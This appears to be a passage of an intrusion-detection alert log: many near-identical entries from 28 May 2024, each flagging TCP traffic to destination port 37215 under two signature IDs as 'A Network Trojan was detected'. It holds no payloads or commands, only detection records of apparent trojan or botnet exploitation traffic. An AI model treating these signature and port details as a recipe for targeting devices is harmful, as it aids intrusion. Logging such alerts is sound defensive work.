            Timestamp:05/28/24-09:55:49.612023
            SID:2835222
            Source Port:39832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.747038
            SID:2835222
            Source Port:33224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510136
            SID:2829579
            Source Port:33426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875171
            SID:2829579
            Source Port:59210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809547
            SID:2835222
            Source Port:50702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935902
            SID:2829579
            Source Port:49386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.732150
            SID:2835222
            Source Port:45928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770312
            SID:2835222
            Source Port:37418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.886030
            SID:2829579
            Source Port:44536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802221
            SID:2829579
            Source Port:59424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774675
            SID:2835222
            Source Port:58410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746890
            SID:2835222
            Source Port:40334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996230
            SID:2829579
            Source Port:47276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596943
            SID:2835222
            Source Port:45872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723412
            SID:2829579
            Source Port:47520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.658721
            SID:2835222
            Source Port:53478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004830
            SID:2829579
            Source Port:43602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057395
            SID:2829579
            Source Port:41968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999004
            SID:2829579
            Source Port:60106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.347815
            SID:2835222
            Source Port:48764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437098
            SID:2835222
            Source Port:59468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914935
            SID:2835222
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961457
            SID:2829579
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.072297
            SID:2829579
            Source Port:38550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508250
            SID:2835222
            Source Port:56790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459727
            SID:2829579
            Source Port:53718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553063
            SID:2829579
            Source Port:54496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.123677
            SID:2829579
            Source Port:49290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872706
            SID:2829579
            Source Port:36582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905909
            SID:2829579
            Source Port:60954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640543
            SID:2835222
            Source Port:58564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147185
            SID:2835222
            Source Port:38350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414550
            SID:2829579
            Source Port:55254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079497
            SID:2829579
            Source Port:58252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917684
            SID:2829579
            Source Port:45740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876351
            SID:2835222
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377209
            SID:2829579
            Source Port:58078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433205
            SID:2829579
            Source Port:57850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.685927
            SID:2835222
            Source Port:45366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899826
            SID:2829579
            Source Port:36230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839492
            SID:2829579
            Source Port:58236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850604
            SID:2829579
            Source Port:47796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555092
            SID:2835222
            Source Port:35850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809584
            SID:2835222
            Source Port:50624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047389
            SID:2835222
            Source Port:38522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279826
            SID:2835222
            Source Port:52948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919628
            SID:2835222
            Source Port:51968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892443
            SID:2829579
            Source Port:56918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842780
            SID:2829579
            Source Port:56386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966882
            SID:2835222
            Source Port:47760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261128
            SID:2829579
            Source Port:39468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836656
            SID:2829579
            Source Port:44300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473971
            SID:2829579
            Source Port:47272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547786
            SID:2829579
            Source Port:54746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760265
            SID:2829579
            Source Port:51942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.050465
            SID:2829579
            Source Port:52340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757838
            SID:2835222
            Source Port:39934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002236
            SID:2835222
            Source Port:37764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034261
            SID:2835222
            Source Port:56852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321699
            SID:2829579
            Source Port:53672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.841196
            SID:2829579
            Source Port:36254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252176
            SID:2829579
            Source Port:36808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805209
            SID:2835222
            Source Port:50916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541395
            SID:2835222
            Source Port:48748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943353
            SID:2829579
            Source Port:37812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026397
            SID:2829579
            Source Port:51326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.663829
            SID:2835222
            Source Port:53492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911974
            SID:2835222
            Source Port:60348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061413
            SID:2835222
            Source Port:56992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.604944
            SID:2829579
            Source Port:38070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612172
            SID:2829579
            Source Port:49548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714659
            SID:2829579
            Source Port:58668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736350
            SID:2829579
            Source Port:33662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815251
            SID:2829579
            Source Port:55940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.930881
            SID:2829579
            Source Port:49170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231190
            SID:2835222
            Source Port:44912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.863097
            SID:2829579
            Source Port:45712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.794068
            SID:2829579
            Source Port:56034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491323
            SID:2835222
            Source Port:51262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896511
            SID:2829579
            Source Port:60990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682048
            SID:2829579
            Source Port:60320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777751
            SID:2829579
            Source Port:58566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879588
            SID:2829579
            Source Port:45310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862746
            SID:2835222
            Source Port:42798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333097
            SID:2829579
            Source Port:42954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.960331
            SID:2829579
            Source Port:51750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771121
            SID:2835222
            Source Port:56070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314055
            SID:2835222
            Source Port:50688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895636
            SID:2829579
            Source Port:34766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.915901
            SID:2829579
            Source Port:54428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929887
            SID:2829579
            Source Port:38664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639438
            SID:2835222
            Source Port:41834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.942960
            SID:2835222
            Source Port:58358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741520
            SID:2829579
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877404
            SID:2835222
            Source Port:55102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873326
            SID:2835222
            Source Port:50634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027115
            SID:2835222
            Source Port:53516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924768
            SID:2829579
            Source Port:52964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775924
            SID:2835222
            Source Port:41930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784028
            SID:2829579
            Source Port:45124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968291
            SID:2829579
            Source Port:38724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766315
            SID:2835222
            Source Port:39180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012356
            SID:2835222
            Source Port:48394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855606
            SID:2829579
            Source Port:56968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771101
            SID:2835222
            Source Port:49578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954200
            SID:2829579
            Source Port:40944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857567
            SID:2835222
            Source Port:58798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944202
            SID:2835222
            Source Port:47916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038180
            SID:2829579
            Source Port:43620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078367
            SID:2829579
            Source Port:48636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739130
            SID:2829579
            Source Port:49524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734977
            SID:2835222
            Source Port:50042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309452
            SID:2835222
            Source Port:59596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187212
            SID:2835222
            Source Port:47824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772478
            SID:2835222
            Source Port:48524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739072
            SID:2835222
            Source Port:39868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014594
            SID:2829579
            Source Port:40200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871200
            SID:2835222
            Source Port:58286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054035
            SID:2829579
            Source Port:37172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334297
            SID:2835222
            Source Port:43628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896207
            SID:2835222
            Source Port:49650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.731133
            SID:2829579
            Source Port:56574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661606
            SID:2835222
            Source Port:41064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651269
            SID:2829579
            Source Port:47514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809804
            SID:2829579
            Source Port:52422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532301
            SID:2829579
            Source Port:49024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818339
            SID:2835222
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508186
            SID:2835222
            Source Port:47336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917655
            SID:2829579
            Source Port:48334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062656
            SID:2829579
            Source Port:39120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654760
            SID:2835222
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774811
            SID:2829579
            Source Port:52972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442335
            SID:2835222
            Source Port:57358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906049
            SID:2835222
            Source Port:57766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375224
            SID:2829579
            Source Port:39380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743687
            SID:2835222
            Source Port:47296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957377
            SID:2829579
            Source Port:54242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861375
            SID:2835222
            Source Port:36592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855767
            SID:2835222
            Source Port:37850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855231
            SID:2835222
            Source Port:47018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807535
            SID:2835222
            Source Port:47730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778373
            SID:2835222
            Source Port:44024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021881
            SID:2829579
            Source Port:56202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843464
            SID:2835222
            Source Port:43076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856488
            SID:2829579
            Source Port:39642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334451
            SID:2829579
            Source Port:37218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.964260
            SID:2829579
            Source Port:36362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654597
            SID:2829579
            Source Port:48440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942448
            SID:2829579
            Source Port:39240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294662
            SID:2835222
            Source Port:48132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026369
            SID:2835222
            Source Port:58200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969195
            SID:2835222
            Source Port:56812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953652
            SID:2829579
            Source Port:34766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516622
            SID:2829579
            Source Port:56858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994775
            SID:2829579
            Source Port:35660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767111
            SID:2835222
            Source Port:42974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057930
            SID:2835222
            Source Port:43606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289759
            SID:2829579
            Source Port:59786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185873
            SID:2835222
            Source Port:41242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665243
            SID:2835222
            Source Port:34184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735647
            SID:2829579
            Source Port:53638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792767
            SID:2835222
            Source Port:55762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605538
            SID:2829579
            Source Port:41476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068541
            SID:2835222
            Source Port:56630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687643
            SID:2835222
            Source Port:52046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412734
            SID:2835222
            Source Port:41942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295156
            SID:2829579
            Source Port:55712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754880
            SID:2835222
            Source Port:59016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916943
            SID:2835222
            Source Port:57832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.540392
            SID:2829579
            Source Port:45200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675289
            SID:2829579
            Source Port:56680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.753791
            SID:2835222
            Source Port:43442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879803
            SID:2835222
            Source Port:43136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064033
            SID:2835222
            Source Port:53704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951474
            SID:2829579
            Source Port:58772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555381
            SID:2829579
            Source Port:58036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910000
            SID:2829579
            Source Port:45396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581108
            SID:2835222
            Source Port:57136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772273
            SID:2829579
            Source Port:42784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919413
            SID:2835222
            Source Port:35482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060133
            SID:2829579
            Source Port:56356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309557
            SID:2835222
            Source Port:59198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.442077
            SID:2835222
            Source Port:50084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.727154
            SID:2835222
            Source Port:54978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818287
            SID:2835222
            Source Port:37624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048105
            SID:2835222
            Source Port:54030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617631
            SID:2829579
            Source Port:51084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317157
            SID:2829579
            Source Port:40192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912940
            SID:2829579
            Source Port:49466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326916
            SID:2835222
            Source Port:33074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989816
            SID:2835222
            Source Port:48586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880549
            SID:2829579
            Source Port:44868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026301
            SID:2835222
            Source Port:51736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824793
            SID:2835222
            Source Port:42876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611310
            SID:2835222
            Source Port:40384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757361
            SID:2829579
            Source Port:50296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898955
            SID:2829579
            Source Port:37762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919568
